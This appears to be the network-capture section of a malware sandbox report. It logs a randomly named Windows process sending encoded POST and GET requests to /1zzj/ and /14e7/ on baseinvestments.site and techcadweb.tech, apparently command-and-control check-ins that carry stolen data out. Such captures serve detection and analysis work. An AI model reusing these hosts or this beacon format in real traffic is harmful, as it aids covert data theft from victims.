13	192.168.2.4	49750	66.235.200.145	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:32.731637001 CEST	800	OUT	POST /1zzj/ HTTP/1.1 Host: www.baseinvestments.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.baseinvestments.site Referer: http://www.baseinvestments.site/1zzj/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 54 38 54 4c 55 49 66 39 59 6f 67 32 35 56 6d 32 32 71 33 4b 78 45 43 2f 67 66 41 72 79 50 56 75 66 33 4e 77 43 6d 56 47 41 74 55 58 2b 36 74 48 49 44 69 70 37 64 68 54 33 61 53 52 32 75 63 54 76 68 51 7a 65 57 43 46 68 65 46 57 35 74 61 42 32 67 68 54 30 34 39 37 35 73 54 61 7a 6b 76 68 4f 56 6c 78 66 62 4e 6f 75 31 48 32 67 54 62 4b 64 45 58 5a 35 51 62 65 32 45 55 56 6c 48 44 32 57 50 48 73 35 63 6f 63 45 46 4f 76 77 76 55 50 54 38 4b 54 37 73 42 54 38 63 2b 74 6b 36 53 52 41 6c 52 2f 44 59 79 32 6c 30 2f 6e 62 41 66 37 6d 2f 6b 6b 72 49 4d 66 6e 6c 4f 41 32 5a 76 4e 31 67 3d 3d Data Ascii: SXqH06e=T8TLUIf9Yog25Vm22q3KxEC/gfAryPVuf3NwCmVGAtUX+6tHIDip7dhT3aSR2ucTvhQzeWCFheFW5taB2ghT04975sTazkvhOVlxfbNou1H2gTbKdEXZ5Qbe2EUVlHD2WPHs5cocEFOvwvUPT8KT7sBT8c+tk6SRAlR/DYy2l0/nbAf7m/kkrIMfnlOA2ZvN1g==
Aug 2, 2024 13:42:33.330017090 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Set-Cookie: _cfuvid=pz3DjthY98aR.Ih6qgCqSWfwbMNl8_ZIAUVGYxVeObw-1722598953281-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnly Server: cloudflare CF-RAY: 8acdce20ff6c8c1e-EWR Content-Encoding: gzip Data Raw: 34 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a [TRUNCATED] Data Ascii: 4aaVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF+4a0EwDjG=\|2gy\|'d]bEV
Aug 2, 2024 13:42:33.330077887 CEST	607	IN	Data Raw: 44 56 6e 21 7a ea ab 86 89 2a da 5b 61 54 d7 eb d1 2b 9d 5b 61 26 2e 85 d6 b0 5a 9e 3b 40 e1 52 78 ef d0 32 87 1a 2b 3f cf ba 47 eb 55 25 f4 d4 4c ab a4 d4 e9 6c 9c 26 73 9d a8 46 7a c2 05 89 ec 3a 2f 7c ef 58 8b ce 89 1a 13 d1 a7 d9 c6 e4 ef 0b Data Ascii: DVn!z[aT+[a&.Z;@Rx2+?GU%Ll&sFz:/\|X>FbQhend5>5]VRl +;xs],x5#sDfY9w<^/']/'dkZTZ8R'YHeKEzPg3~Pf}::>p7d^+orEwH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	66.235.200.145	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:35.325066090 CEST	820	OUT	POST /1zzj/ HTTP/1.1 Host: www.baseinvestments.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.baseinvestments.site Referer: http://www.baseinvestments.site/1zzj/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 54 38 54 4c 55 49 66 39 59 6f 67 32 32 56 32 32 35 72 33 4b 6b 55 43 38 39 76 41 72 6b 2f 56 71 66 33 42 77 43 69 46 6f 42 59 6b 58 2b 66 52 48 4a 43 69 70 2b 64 68 54 35 36 53 55 75 4f 63 63 76 68 64 4f 65 58 75 46 68 66 6c 57 35 6f 65 42 78 57 70 51 31 6f 39 35 69 63 54 59 39 45 76 68 4f 56 6c 78 66 61 70 57 75 31 66 32 67 69 72 4b 4d 56 58 61 30 77 61 73 78 45 55 56 68 48 44 79 57 50 48 65 35 64 6b 36 45 44 4b 76 77 71 6f 50 54 74 4b 53 31 73 42 56 34 63 2f 48 6b 61 6a 4c 4a 30 64 78 4f 4c 61 58 74 55 37 49 54 6d 4f 68 33 4f 46 7a 35 49 6f 73 36 69 48 30 37 61 53 45 75 75 44 72 33 31 73 75 62 59 52 2b 73 54 4b 37 35 49 34 43 31 61 30 3d Data Ascii: SXqH06e=T8TLUIf9Yog22V225r3KkUC89vArk/Vqf3BwCiFoBYkX+fRHJCip+dhT56SUuOccvhdOeXuFhflW5oeBxWpQ1o95icTY9EvhOVlxfapWu1f2girKMVXa0wasxEUVhHDyWPHe5dk6EDKvwqoPTtKS1sBV4c/HkajLJ0dxOLaXtU7ITmOh3OFz5Ios6iH07aSEuuDr31subYR+sTK75I4C1a0=
Aug 2, 2024 13:42:35.908802032 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Set-Cookie: _cfuvid=WESjX2kzbBtuf5qCrSHkoG4MCXvUAQ.p8iy5XZJFMlI-1722598955857-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnly Server: cloudflare CF-RAY: 8acdce314bf3429d-EWR Content-Encoding: gzip Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a [TRUNCATED] Data Ascii: 49fVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF+4a0EwDjG=\|2gy\|'d]bEV
Aug 2, 2024 13:42:35.908838987 CEST	612	IN	Data Raw: 44 56 6e 21 7a ea ab 86 89 2a da 5b 61 54 d7 eb d1 2b 9d 5b 61 26 2e 85 d6 b0 5a 9e 3b 40 e1 52 78 ef d0 32 87 1a 2b 3f cf ba 47 eb 55 25 f4 d4 4c ab a4 d4 e9 6c 9c 26 73 9d a8 46 7a c2 05 89 ec 3a 2f 7c ef 58 8b ce 89 1a 13 d1 a7 d9 c6 e4 ef 0b Data Ascii: DVn!z[aT+[a&.Z;@Rx2+?GU%Ll&sFz:/\|X>FbQhend5>5]VRl +;xs],x5#sDfY9w<^/']/'dkZTZ8R'YHeKEzPg3~Pf}::>p7d^+orEwH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	66.235.200.145	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:37.903157949 CEST	10902	OUT	POST /1zzj/ HTTP/1.1 Host: www.baseinvestments.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.baseinvestments.site Referer: http://www.baseinvestments.site/1zzj/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 54 38 54 4c 55 49 66 39 59 6f 67 32 32 56 32 32 35 72 33 4b 6b 55 43 38 39 76 41 72 6b 2f 56 71 66 33 42 77 43 69 46 6f 42 59 73 58 2f 74 70 48 47 42 4b 70 35 64 68 54 6e 71 53 56 75 4f 63 37 76 68 46 43 65 58 7a 77 68 61 68 57 32 75 69 42 77 6b 42 51 67 34 39 35 39 73 54 46 7a 6b 76 77 4f 56 31 39 66 61 35 57 75 31 66 32 67 68 44 4b 4d 45 58 61 79 77 62 65 32 45 55 52 6c 48 44 4b 57 50 66 4f 35 64 67 4d 48 7a 71 76 77 4b 59 50 55 66 69 53 39 73 42 58 31 38 2f 66 6b 61 75 56 4a 77 38 4f 4f 4b 75 78 74 57 6e 49 52 78 32 33 75 36 4a 38 75 4c 4d 31 69 51 72 2b 33 4b 57 67 68 73 50 73 77 58 34 49 4a 5a 56 4c 6f 41 6a 52 73 59 30 33 6b 61 47 2b 56 48 33 6a 75 59 42 41 56 6c 50 38 62 6e 67 75 66 73 2f 46 32 42 58 62 6e 64 45 76 45 34 78 58 6d 57 55 4b 5a 61 4d 55 54 54 6d 45 71 43 31 50 74 46 77 52 53 61 55 68 59 59 61 4c 74 76 32 75 39 68 36 78 53 53 33 79 4c 75 79 69 35 58 6c 55 59 66 33 33 77 6e 4d 42 4a 4b 30 71 45 78 79 55 37 4f 33 66 46 50 71 63 4c 77 6e 2f 38 52 37 4a 64 30 [TRUNCATED] Data Ascii: SXqH06e=T8TLUIf9Yog22V225r3KkUC89vArk/Vqf3BwCiFoBYsX/tpHGBKp5dhTnqSVuOc7vhFCeXzwhahW2uiBwkBQg4959sTFzkvwOV19fa5Wu1f2ghDKMEXaywbe2EURlHDKWPfO5dgMHzqvwKYPUfiS9sBX18/fkauVJw8OOKuxtWnIRx23u6J8uLM1iQr+3KWghsPswX4IJZVLoAjRsY03kaG+VH3juYBAVlP8bngufs/F2BXbndEvE4xXmWUKZaMUTTmEqC1PtFwRSaUhYYaLtv2u9h6xSS3yLuyi5XlUYf33wnMBJK0qExyU7O3fFPqcLwn/8R7Jd01w6q2st6GR/HbOkeQwDNlXhHBlh43FXT2ovEEXIgl5yNlRe4ctepYL3R067GrHEN9JZy3HL4+ki5RReYryc/MmLKdhFMJuHqdD8HnJhqK4ri7oXtTvl1BSJNl7k+xmKqt9aSnhbojiaUtmI+ZQasm1I2ADzxAQ9cor7c3fsZSX4r9zyQLL733y0ys//mhYNos5wBmBEKGD/+rzSfhvNIcJRiXevLGBSTA85TTk+FuLmbokYStwnYQL0lotxoFqVHz3GCVu62gLmvzoEIZn3PIBeOLXxVsKuWH5NqX/AH3gOLhxqAfG+jPYAVkypJrzg1x4T2QhJs6quJHS/zdV59yu4+mL8dEjLesP6+uj2bemiKGIs6S0M6yhdUILG0zgpeSctG/+7MQIysLEiAJ7STLEk2grSinuW3szGGI/BsFcdvrH1K0ezNaPuUoga72WLperm6dOcBUf5pQmZ0rq55aXhkUEG+igsjwTy08jhyzhXWkgThphHvB4QVbGLjpw6To6fPp6j1TTNb6JIL7AS+53ORe5oz9kRc/AB31VglPD5PhbmYTf7BIdVcXoFAOWv4f1BvEweYU6e/Dfr3DUETHfygA7Ni/xvWDnBCfzTplYyHKhyvU/23twxBE2xG/07zLqFVqsgkAx5TkBe5gAJ3eP4TEcW77YZpV/ [TRUNCATED]
Aug 2, 2024 13:42:38.207317114 CEST	1236	OUT	POST /1zzj/ HTTP/1.1 Host: www.baseinvestments.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.baseinvestments.site Referer: http://www.baseinvestments.site/1zzj/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 54 38 54 4c 55 49 66 39 59 6f 67 32 32 56 32 32 35 72 33 4b 6b 55 43 38 39 76 41 72 6b 2f 56 71 66 33 42 77 43 69 46 6f 42 59 73 58 2f 74 70 48 47 42 4b 70 35 64 68 54 6e 71 53 56 75 4f 63 37 76 68 46 43 65 58 7a 77 68 61 68 57 32 75 69 42 77 6b 42 51 67 34 39 35 39 73 54 46 7a 6b 76 77 4f 56 31 39 66 61 35 57 75 31 66 32 67 68 44 4b 4d 45 58 61 79 77 62 65 32 45 55 52 6c 48 44 4b 57 50 66 4f 35 64 67 4d 48 7a 71 76 77 4b 59 50 55 66 69 53 39 73 42 58 31 38 2f 66 6b 61 75 56 4a 77 38 4f 4f 4b 75 78 74 57 6e 49 52 78 32 33 75 36 4a 38 75 4c 4d 31 69 51 72 2b 33 4b 57 67 68 73 50 73 77 58 34 49 4a 5a 56 4c 6f 41 6a 52 73 59 30 33 6b 61 47 2b 56 48 33 6a 75 59 42 41 56 6c 50 38 62 6e 67 75 66 73 2f 46 32 42 58 62 6e 64 45 76 45 34 78 58 6d 57 55 4b 5a 61 4d 55 54 54 6d 45 71 43 31 50 74 46 77 52 53 61 55 68 59 59 61 4c 74 76 32 75 39 68 36 78 53 53 33 79 4c 75 79 69 35 58 6c 55 59 66 33 33 77 6e 4d 42 4a 4b 30 71 45 78 79 55 37 4f 33 66 46 50 71 63 4c 77 6e 2f 38 52 37 4a 64 30 [TRUNCATED] Data Ascii: SXqH06e=T8TLUIf9Yog22V225r3KkUC89vArk/Vqf3BwCiFoBYsX/tpHGBKp5dhTnqSVuOc7vhFCeXzwhahW2uiBwkBQg4959sTFzkvwOV19fa5Wu1f2ghDKMEXaywbe2EURlHDKWPfO5dgMHzqvwKYPUfiS9sBX18/fkauVJw8OOKuxtWnIRx23u6J8uLM1iQr+3KWghsPswX4IJZVLoAjRsY03kaG+VH3juYBAVlP8bngufs/F2BXbndEvE4xXmWUKZaMUTTmEqC1PtFwRSaUhYYaLtv2u9h6xSS3yLuyi5XlUYf33wnMBJK0qExyU7O3fFPqcLwn/8R7Jd01w6q2st6GR/HbOkeQwDNlXhHBlh43FXT2ovEEXIgl5yNlRe4ctepYL3R067GrHEN9JZy3HL4+ki5RReYryc/MmLKdhFMJuHqdD8HnJhqK4ri7oXtTvl1BSJNl7k+xmKqt9aSnhbojiaUtmI+ZQasm1I2ADzxAQ9cor7c3fsZSX4r9zyQLL733y0ys//mhYNos5wBmBEKGD/+rzSfhvNIcJRiXevLGBSTA85TTk+FuLmbokYStwnYQL0lotxoFqVHz3GCVu62gLmvzoEIZn3PIBeOLXxVsKuWH5NqX/AH3gOL
Aug 2, 2024 13:42:38.301795006 CEST	3708	OUT	Data Raw: 6c 4e 58 6e 4e 52 6f 42 77 68 38 42 6d 58 43 6d 79 77 41 6f 59 44 75 74 65 34 5a 41 42 74 6e 6d 41 70 35 35 2f 69 78 50 61 61 4e 6f 30 71 68 38 7a 4f 73 6c 46 62 61 4e 4b 72 30 51 58 42 31 6f 34 6f 71 30 67 63 34 73 78 38 37 66 62 68 5a 62 76 4b Data Ascii: lNXnNRoBwh8BmXCmywAoYDute4ZABtnmAp55/ixPaaNo0qh8zOslFbaNKr0QXB1o4oq0gc4sx87fbhZbvKvCuu+8ALBocbgRl2/hVaT6NzdJeppmxmTDn/DayMcH0N1bFpagD0fMH1Z9fLpABeJogd8g+bQ6TO6lX8NLg2dCFKgonSiCrMlIRxBKsP0ieqsh4IJg1+u4f23423mi0O6G5vlAfpZwjXrm+q6IUPZcT7wKgn1xeWI
Aug 2, 2024 13:42:38.301881075 CEST	4722	OUT	Data Raw: 4e 57 2b 2f 58 7a 77 72 61 47 30 47 50 36 69 51 34 32 30 51 63 53 75 69 44 75 54 49 4e 6c 41 52 6c 77 56 41 48 55 56 5a 44 78 58 79 66 67 58 44 79 67 6a 52 69 54 64 72 73 37 6d 59 51 61 4a 4d 4f 79 37 58 52 2f 37 5a 53 50 62 79 74 51 30 69 51 4b Data Ascii: NW+/XzwraG0GP6iQ420QcSuiDuTINlARlwVAHUVZDxXyfgXDygjRiTdrs7mYQaJMOy7XR/7ZSPbytQ0iQKNsirRarblfW6rcnOL15s3CCvP/AhmyZ9l80b7iHz9wwcYEOUCvlmfmOGbRPqF4MPBgf2lkqQVJyXgwJu+KdlrgobMHQf1FxL4Meh2LDuHa79IGsnLd5deuidK2UBiiiPwNeMI7L4vEWvM4+ZDgs8wxh3qjf2lPxly
Aug 2, 2024 13:42:38.562310934 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Set-Cookie: _cfuvid=4MfUvizft05ZcYzsPKqgTMqHficOxqAY8tohDyQ02y0-1722598958514-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnly Server: cloudflare CF-RAY: 8acdce41f8a77d14-EWR Content-Encoding: gzip Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d 7b 7f c5 44 45 73 28 42 d3 de 6c 8a 42 2b 7b 91 a4 45 1b 20 6d 03 a4 45 d0 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 ff 5e 50 a4 bc da 6c d2 22 89 2f b2 86 f3 f5 e6 0d 9f 5d 3c f8 f1 f7 e7 7f fc f5 ea 27 68 7c ab b7 67 45 78 80 16 a6 de 64 68 d8 9f af b3 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e 1e 81 a1 1d 69 4d 43 06 7c 0c f2 ca 6b dc 3e 13 0e e1 85 d9 a3 f3 2d 1a ef 1e c1 cb 97 cf e1 61 2b 85 6b 2e e1 39 b5 ca d4 f0 9a c8 14 3c 06 84 50 57 59 d5 79 70 b6 da 64 8d f7 5d ce 79 29 1c aa db 34 4b a7 3c f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe dd a3 3d a6 c7 f2 ad cb b6 05 8f a9 62 56 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 07 ff 9c 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 97 e3 19 6b e9 1d fb 4f 87 01 cb 1b e5 3f e9 f3 fe ec ac 24 79 9c 4a 89 ea a6 b6 d4 1b c9 2a d2 64 73 18 1a e5 31 a6 4a 96 52 8b ea 26 5a [TRUNCATED] Data Ascii: 49fVM6={DEs(BlB+{E mEG%)N^Pl"/]<'h\|gExdhhPbQ&+:>G7o6B6dFYY!e$iMC\|k>-a+k.9<PWYypd]y)4K<cT[=bV&xr.~t`NS$+kO?$yJds1JR&Zhvi`%%hoa5fKVacrx1Diqa1w^,zU5^Xj\|S+D\|rC\.W]MzRS^a(/S{*q1l>I@Xzs;8T1Ci%ia=GSF+4a0EwDjG=\|2gy\|'d]bEV
Aug 2, 2024 13:42:38.562392950 CEST	612	IN	Data Raw: 44 56 6e 21 7a ea ab 86 89 2a da 5b 61 54 d7 eb d1 2b 9d 5b 61 26 2e 85 d6 b0 5a 9e 3b 40 e1 52 78 ef d0 32 87 1a 2b 3f cf ba 47 eb 55 25 f4 d4 4c ab a4 d4 e9 6c 9c 26 73 9d a8 46 7a c2 05 89 ec 3a 2f 7c ef 58 8b ce 89 1a 13 d1 a7 d9 c6 e4 ef 0b Data Ascii: DVn!z[aT+[a&.Z;@Rx2+?GU%Ll&sFz:/\|X>FbQhend5>5]VRl +;xs],x5#sDfY9w<^/']/'dkZTZ8R'YHeKEzPg3~Pf}::>p7d^+orEwH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	66.235.200.145	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:40.479182005 CEST	517	OUT	GET /1zzj/?AV=_ng4uzR8Zz&SXqH06e=e+7rX/frfIk10QOuz43kkA+7jJ9/vO9/QWtHdTtOO6Fm9aJkeQOf2OoD1t74k7EvqDg8Zmex5vpF0dGn3lNO/doA4NH7zXjCLT1laLVyk0bFqCORK0S89RE= HTTP/1.1 Host: www.baseinvestments.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:42:41.072725058 CEST	815	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 02 Aug 2024 11:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://baseinvestments.site/1zzj/?AV=_ng4uzR8Zz&SXqH06e=e+7rX/frfIk10QOuz43kkA+7jJ9/vO9/QWtHdTtOO6Fm9aJkeQOf2OoD1t74k7EvqDg8Zmex5vpF0dGn3lNO/doA4NH7zXjCLT1laLVyk0bFqCORK0S89RE= host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: MISS Set-Cookie: _cfuvid=FW4jX75G_dwOpgeI4fmMz8msjChhB5d8xhsIo1JdfXQ-1722598961023-0.0.1.1-604800000; path=/; domain=.www.baseinvestments.site; HttpOnly Server: cloudflare CF-RAY: 8acdce518d1443cd-EWR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	162.241.148.243	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:46.623353004 CEST	785	OUT	POST /14e7/ HTTP/1.1 Host: www.techcadweb.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.techcadweb.tech Referer: http://www.techcadweb.tech/14e7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 57 41 6e 77 36 4a 70 62 66 6e 31 6a 2b 6f 4f 41 51 6f 55 6c 4d 6c 35 6f 4f 36 6c 6e 68 68 61 4e 35 52 45 41 4a 70 53 67 41 6f 2b 68 4b 73 6c 76 73 6f 67 67 53 62 4f 47 4d 39 46 54 4b 4a 54 32 46 4d 36 49 7a 77 53 59 49 39 36 46 41 45 4b 4c 44 41 54 6c 67 39 79 57 6c 4a 54 4d 5a 6e 42 44 49 45 58 6a 39 43 49 76 4b 45 51 77 47 33 4d 78 71 34 55 33 53 76 59 4a 77 78 6c 43 35 43 75 57 45 4f 67 61 37 61 31 72 49 37 78 64 67 69 6f 66 66 6c 47 66 43 62 59 51 64 36 37 6d 6f 44 37 47 32 42 32 4f 72 6e 49 35 56 53 53 65 6b 4d 79 6f 6e 33 6d 31 68 43 55 36 6f 38 4a 4c 4e 38 73 57 65 51 3d 3d Data Ascii: SXqH06e=WAnw6Jpbfn1j+oOAQoUlMl5oO6lnhhaN5REAJpSgAo+hKslvsoggSbOGM9FTKJT2FM6IzwSYI96FAEKLDATlg9yWlJTMZnBDIEXj9CIvKEQwG3Mxq4U3SvYJwxlC5CuWEOga7a1rI7xdgiofflGfCbYQd67moD7G2B2OrnI5VSSekMyon3m1hCU6o8JLN8sWeQ==
